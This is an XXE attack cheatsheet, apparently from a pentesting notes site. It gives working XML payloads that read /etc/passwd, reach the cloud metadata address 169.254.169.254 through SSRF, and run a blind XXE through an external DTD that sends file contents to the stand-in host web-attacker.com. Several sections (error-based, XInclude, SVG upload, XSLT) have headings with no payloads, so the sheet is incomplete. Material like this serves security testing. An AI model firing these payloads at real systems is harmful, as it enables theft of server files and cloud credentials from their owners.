search

XXE Cheatsheet

hashtag
To retrieve File 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

hashtag
To perform SSRF

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>

Cloud Cheatsheet for SSRF - https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrfarrow-up-right

hashtag
To Retrieve File using Blind XXE

  1. Host malicious external DTD

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

  1. Call malicious external DTD using XML parameter entities

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>

hashtag
Retrieve File Error Based

Scenario 1 -

  1. Host below DTD

  1. Call DTD

Scenario 2 - (Causing error by loading local dtd)

hashtag
XInclude

In few scenarios, we might not have control over entire document(doctype cannot be modified) but only partial control.

In those cases you can use XInclude to retrieve files/perform ssrf.

hashtag
XXE using SVG Upload

hashtag
XSLT

XSL is also like XML, which defines how to present & transform XML documents. If transforms are enabled, this can cause XXE even if doctype is disabled in some cases. [ManageEngine ServiceDesk CVE-2022-47966arrow-up-right]

Payloads - https://swisskyrepo.github.io/PayloadsAllTheThings/XSLT%20Injection/#remote-code-execution-with-javaarrow-up-right

PreviousHTTP Request SmugglingNextAndroid

Last updated